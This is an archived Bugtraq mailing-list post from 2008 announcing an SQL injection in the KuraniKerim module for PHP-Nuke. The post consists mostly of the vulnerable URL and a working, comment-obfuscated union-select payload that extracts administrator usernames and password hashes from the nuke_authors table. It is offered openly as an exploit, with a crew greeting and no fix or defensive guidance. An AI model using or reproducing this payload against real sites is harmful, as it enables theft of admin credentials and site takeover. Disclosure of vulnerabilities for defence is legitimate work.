[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

PHP-Nuke Module KuraniKerim [sid] SQL Injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PHP-Nuke Module KuraniKerim [sid] SQL Injection
From: lovebug@xxxxxxxxxx
Date: 17 May 2008 14:34:48 -0000

Author : Lovebug    Italy   Rbt-4 Crew  
           
               www.rbt-4.net
 


 PHP-Nuke Module KuraniKerim [sid] SQL Injection 


Bug : 
modules.php?name=KuraniKerim&op=TurkceNuke_Com_Islami_Moduller_Destek_Sitesi&sid
 = [S Q L] 


 Exploit 
:-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd,aid,2,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

special tnx to:  Rbt-4 crew &  wishes for Robo

Prev by Date: [SECURITY] [DSA 1578-1] New php4 packages fix several vulnerabilities
Next by Date: StanWeb.CMS (default.asp id) Remote SQL Injection Exploit
Previous by thread: [SECURITY] [DSA 1578-1] New php4 packages fix several vulnerabilities
Next by thread: StanWeb.CMS (default.asp id) Remote SQL Injection Exploit
Index(es):
- Date
- Thread